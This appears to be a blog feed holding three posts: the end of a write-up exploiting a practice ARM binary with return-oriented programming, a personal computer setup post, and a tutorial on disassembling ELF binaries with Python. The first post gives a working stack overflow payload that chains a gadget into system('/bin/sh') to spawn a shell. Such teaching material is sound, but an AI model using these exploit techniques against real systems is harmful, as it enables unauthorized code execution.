There are three functions that are of importance here, main, winner and gadget. Disassembling the main function:

gdb main disassembly

We see a buffer of 16 bytes being created (sub sp, sp, #16), and some calls to puts()/printf() and scanf(). Looks like winner and gadget are never actually called.

Disassembling the gadget function:

gdb gadget disassembly

This is fairly simple, the stack is being initialized by pushing {r11}, which is also the frame pointer (fp). What’s interesting is the pop {r0, pc} instruction in the middle. This is a gadget.

We can use this to control what goes into r0 and pc. Unlike in x86 where arguments to functions are passed on the stack, in ARM the registers r0 to r3 are used for this. So this gadget effectively allows us to pass arguments to functions using r0, and subsequently jumping to them by passing its address in pc. Neat.

Moving on to the disassembly of the winner function:

gdb winner disassembly

Here, we see a calls to puts(), system() and finally, exit(). So our end goal here is to, quite obviously, execute code via the system() function.

Now that we have an overview of what’s in the binary, let’s formulate a method of exploitation by messing around with inputs.

Messing around with inputs :^)

Back to gdb, hit r to run and pass in a patterned input, like in the screenshot.

gdb info reg post segfault

We hit a segfault because of invalid memory at address 0x46464646. Notice the pc has been overwritten with our input. So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.

Since we know the offset at which the pc gets overwritten, we can now control program execution flow. Let’s try jumping to the winner function.

Disassemble winner again using disas winner and note down the offset of the second instruction—add r11, sp, #4. For this, we’ll use Python to print our input string replacing FFFF with the address of winner. Note the endianness.

$ python -c 'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")' | ./rop2

jump to winner

The reason we don’t jump to the first instruction is because we want to control the stack ourselves. If we allow push {rll, lr} (first instruction) to occur, the program will pop those out after winner is done executing and we will no longer control where it jumps to.

So that didn’t do much, just prints out a string “Nothing much here…”. But it does however, contain system(). Which somehow needs to be populated with an argument to do what we want (run a command, execute a shell, etc.).

To do that, we’ll follow a multi-step process:

  1. Jump to the address of gadget, again the 2nd instruction. This will pop r0 and pc.
  2. Push our command to be executed, say “/bin/sh” onto the stack. This will go into r0.
  3. Then, push the address of system(). And this will go into pc.

The pseudo-code is something like this:

string = AAAABBBBCCCCDDDDEEEE
gadget = # addr of gadget
binsh  = # addr of /bin/sh
system = # addr of system()

print(string + gadget + binsh + system)

Clean and mean.

The exploit

To write the exploit, we’ll use Python and the absolute godsend of a library—struct. It allows us to pack the bytes of addresses to the endianness of our choice. It probably does a lot more, but who cares.

Let’s start by fetching the address of /bin/sh. In gdb, set a breakpoint at main, hit r to run, and search the entire address space for the string “/bin/sh”:

(gdb) find &system, +9999999, "/bin/sh"

gdb finding /bin/sh

One hit at 0xb6f85588. The addresses of gadget and system() can be found from the disassmblies from earlier. Here’s the final exploit code:

import struct

binsh = struct.pack("I", 0xb6f85588)
string = "AAAABBBBCCCCDDDDEEEE"
gadget = struct.pack("I", 0x00010550)
system = struct.pack("I", 0x00010538)

print(string + gadget + binsh + system)

Honestly, not too far off from our pseudo-code :)

Let’s see it in action:

the shell!

Notice that it doesn’t work the first time, and this is because /bin/sh terminates when the pipe closes, since there’s no input coming in from STDIN. To get around this, we use cat(1) which allows us to relay input through it to the shell. Nifty trick.

Conclusion

This was a fairly basic challenge, with everything laid out conveniently. Actual ropchaining is a little more involved, with a lot more gadgets to be chained to acheive code execution.

Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.

]]>
https://icyphox.sh/blog/rop-on-armThu, 06 Jun 2019 00:00:00 +0000https://icyphox.sh/blog/rop-on-arm
My setupHardware

The only computer I have with me is my HP Envy 13 (2018) (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u, 8 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to.

For my phone, I use a OnePlus 6T, running stock OxygenOS. As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted. I’m also a proud owner of a Nexus 5, which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal.

My watch is a Samsung Gear S3 Frontier. Tizen is definitely better than Android Wear.

My keyboard, although not with me in college, is a very old Dell SK-8110. For the little bit of gaming that I do, I use a HP m150 gaming mouse. It’s the perfect size (and color).

For my music, I use the Bose SoundLink II. Great pair of headphones, although the ear cups need replacing.

And the software

My distro of choice for the past ~1 year has been elementary OS. I used to be an Arch Linux elitist, complete with an esoteric window manager, all riced. I now use whatever JustWorks™.

Update: As of June 2019, I’ve switched over to a vanilla Debian 9 Stretch install, running i3 as my window manager. If you want, you can dig through my configs at my dotfiles repo.

Here’s a (riced) screenshot of my desktop.

scrot

Most of my work is done in either the browser, or the terminal. My shell is pure zsh, as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need a framework. It’s useless bloat. The prompt itself is generated using a framework I built in Nimnicy. My primary text editor is nvim. Again, all configs in my dotfiles repo linked above. I manage all my passwords using pass(1), and I use rofi-pass to access them via rofi.

Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons, keeps your global namespace clean and a single command to drop into a Kali shell.

I use a DigitalOcean droplet (BLR1) as a public filehost, found at x.icyphox.sh. The UI is the wonderful serve, by ZEIT. The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes.

I plan on converting my desktop back at home into a homeserver setup. Soon™.

]]>
https://icyphox.sh/blog/my-setupMon, 13 May 2019 00:00:00 +0000https://icyphox.sh/blog/my-setup
Python for Reverse Engineering #1: ELF BinariesWhile solving complex reversing challenges, we often use established tools like radare2 or IDA for disassembling and debugging. But there are times when you need to dig in a little deeper and understand how things work under the hood.

Rolling your own disassembly scripts can be immensely helpful when it comes to automating certain processes, and eventually build your own homebrew reversing toolchain of sorts. At least, that’s what I’m attempting anyway.

Setup

As the title suggests, you’re going to need a Python 3 interpreter before anything else. Once you’ve confirmed beyond reasonable doubt that you do, in fact, have a Python 3 interpreter installed on your system, run

$ pip install capstone pyelftools

where capstone is the disassembly engine we’ll be scripting with and pyelftools to help parse ELF files.

With that out of the way, let’s start with an example of a basic reversing challenge.

/* chall.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
   char *pw = malloc(9);
   pw[0] = 'a';
   for(int i = 1; i <= 8; i++){
       pw[i] = pw[i - 1] + 1;
   }
   pw[9] = '\0';
   char *in = malloc(10);
   printf("password: ");
   fgets(in, 10, stdin);        // 'abcdefghi'
   if(strcmp(in, pw) == 0) {
       printf("haha yes!\n");
   }
   else {
       printf("nah dude\n");
   }
}

Compile it with GCC/Clang:

$ gcc chall.c -o chall.elf

Scripting

For starters, let’s look at the different sections present in the binary.

# sections.py

from elftools.elf.elffile import ELFFile

with open('./chall.elf', 'rb') as f:
    e = ELFFile(f)
    for section in e.iter_sections():
        print(hex(section['sh_addr']), section.name)

This script iterates through all the sections and also shows us where it’s loaded. This will be pretty useful later. Running it gives us

› python sections.py
0x238 .interp
0x254 .note.ABI-tag
0x274 .note.gnu.build-id
0x298 .gnu.hash
0x2c0 .dynsym
0x3e0 .dynstr
0x484 .gnu.version
0x4a0 .gnu.version_r
0x4c0 .rela.dyn
0x598 .rela.plt
0x610 .init
0x630 .plt
0x690 .plt.got
0x6a0 .text
0x8f4 .fini
0x900 .rodata
0x924 .eh_frame_hdr
0x960 .eh_frame
0x200d98 .init_array
0x200da0 .fini_array
0x200da8 .dynamic
0x200f98 .got
0x201000 .data
0x201010 .bss
0x0 .comment
0x0 .symtab
0x0 .strtab
0x0 .shstrtab

Most of these aren’t relevant to us, but a few sections here are to be noted. The .text section contains the instructions (opcodes) that we’re after. The .data section should have strings and constants initialized at compile time. Finally, the .plt which is the Procedure Linkage Table and the .got, the Global Offset Table. If you’re unsure about what these mean, read up on the ELF format and its internals.

Since we know that the .text section has the opcodes, let’s disassemble the binary starting at that address.

# disas1.py

from elftools.elf.elffile import ELFFile
from capstone import *

with open('./bin.elf', 'rb') as f:
    elf = ELFFile(f)
    code = elf.get_section_by_name('.text')
    ops = code.data()
    addr = code['sh_addr']
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i in md.disasm(ops, addr):        
        print(f'0x{i.address:x}:\t{i.mnemonic}\t{i.op_str}')

The code is fairly straightforward (I think). We should be seeing this, on running

› python disas1.py | less      
0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
0x6bd: lea rdi, [rip + 0xe6]
**0x6c4: call qword ptr [rip + 0x200916]**
0x6ca: hlt
... snip ...

The line in bold is fairly interesting to us. The address at [rip + 0x200916] is equivalent to [0x6ca + 0x200916], which in turn evaluates to 0x200fe0. The first call being made to a function at 0x200fe0? What could this function be?

For this, we will have to look at relocations. Quoting linuxbase.org

Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have “relocation entries’’ which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image.

To try and find these relocation entries, we write a third script.

# relocations.py

import sys
from elftools.elf.elffile import ELFFile
from elftools.elf.relocation import RelocationSection

with open('./chall.elf', 'rb') as f:
    e = ELFFile(f)
    for section in e.iter_sections():
        if isinstance(section, RelocationSection):
            print(f'{section.name}:')
            symbol_table = e.get_section(section['sh_link'])
            for relocation in section.iter_relocations():
                symbol = symbol_table.get_symbol(relocation['r_info_sym'])
                addr = hex(relocation['r_offset'])
                print(f'{symbol.name} {addr}')

Let’s run through this code real quick. We first loop through the sections, and check if it’s of the type RelocationSection. We then iterate through the relocations from the symbol table for each section. Finally, running this gives us

› python relocations.py
.rela.dyn:
 0x200d98
 0x200da0
 0x201008
_ITM_deregisterTMCloneTable 0x200fd8
**__libc_start_main 0x200fe0**
__gmon_start__ 0x200fe8
_ITM_registerTMCloneTable 0x200ff0
__cxa_finalize 0x200ff8
stdin 0x201010
.rela.plt:
puts 0x200fb0
printf 0x200fb8
fgets 0x200fc0
strcmp 0x200fc8
malloc 0x200fd0

Remember the function call at 0x200fe0 from earlier? Yep, so that was a call to the well known __libc_start_main. Again, according to linuxbase.org

The __libc_start_main() function shall perform any necessary initialization of the execution environment, call the main function with appropriate arguments, and handle the return from main(). If the main() function returns, the return value shall be passed to the exit() function.

And its definition is like so

int __libc_start_main(int *(main) (int, char * *, char * *), 
int argc, char * * ubp_av, 
void (*init) (void), 
void (*fini) (void), 
void (*rtld_fini) (void), 
void (* stack_end));

Looking back at our disassembly

0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
**0x6bd: lea rdi, [rip + 0xe6]**
0x6c4: call qword ptr [rip + 0x200916]
0x6ca: hlt
... snip ...

but this time, at the lea or Load Effective Address instruction, which loads some address [rip + 0xe6] into the rdi register. [rip + 0xe6] evaluates to 0x7aa which happens to be the address of our main() function! How do I know that? Because __libc_start_main(), after doing whatever it does, eventually jumps to the function at rdi, which is generally the main() function. It looks something like this

To see the disassembly of main, seek to 0x7aa in the output of the script we’d written earlier (disas1.py).

From what we discovered earlier, each call instruction points to some function which we can see from the relocation entries. So following each call into their relocations gives us this

printf 0x650
fgets  0x660
strcmp 0x670
malloc 0x680

Putting all this together, things start falling into place. Let me highlight the key sections of the disassembly here. It’s pretty self-explanatory.

0x7b2: mov edi, 0xa  ; 10
0x7b7: call 0x680    ; malloc

The loop to populate the *pw string

0x7d0:  mov     eax, dword ptr [rbp - 0x14]
0x7d3:  cdqe    
0x7d5:  lea     rdx, [rax - 1]
0x7d9:  mov     rax, qword ptr [rbp - 0x10]
0x7dd:  add     rax, rdx
0x7e0:  movzx   eax, byte ptr [rax]
0x7e3:  lea     ecx, [rax + 1]
0x7e6:  mov     eax, dword ptr [rbp - 0x14]
0x7e9:  movsxd  rdx, eax
0x7ec:  mov     rax, qword ptr [rbp - 0x10]
0x7f0:  add     rax, rdx
0x7f3:  mov     edx, ecx
0x7f5:  mov     byte ptr [rax], dl
0x7f7:  add     dword ptr [rbp - 0x14], 1
0x7fb:  cmp     dword ptr [rbp - 0x14], 8
0x7ff:  jle     0x7d0

And this looks like our strcmp()

0x843:  mov     rdx, qword ptr [rbp - 0x10] ; *in
0x847:  mov     rax, qword ptr [rbp - 8]    ; *pw
0x84b:  mov     rsi, rdx             
0x84e:  mov     rdi, rax
0x851:  call    0x670                       ; strcmp  
0x856:  test    eax, eax                    ; is = 0? 
0x858:  jne     0x868                       ; no? jump to 0x868
0x85a:  lea     rdi, [rip + 0xae]           ; "haha yes!" 
0x861:  call    0x640                       ; puts
0x866:  jmp     0x874
0x868:  lea     rdi, [rip + 0xaa]           ; "nah dude"
0x86f:  call    0x640                       ; puts  

I’m not sure why it uses puts here? I might be missing something; perhaps printf calls puts. I could be wrong. I also confirmed with radare2 that those locations are actually the strings “haha yes!” and “nah dude”.

Update: It’s because of compiler optimization. A printf() (in this case) is seen as a bit overkill, and hence gets simplified to a puts().

Conclusion

Wew, that took quite some time. But we’re done. If you’re a beginner, you might find this extremely confusing, or probably didn’t even understand what was going on. And that’s okay. Building an intuition for reading and grokking disassembly comes with practice. I’m no good at it either.

All the code used in this post is here: https://github.com/icyphox/asdf/tree/master/reversing-elf

Ciao for now, and I’ll see ya in #2 of this series—PE binaries. Whenever that is.

]]>
https://icyphox.sh/blog/python-for-re-1Fri, 08 Feb 2019 00:00:00 +0000https://icyphox.sh/blog/python-for-re-1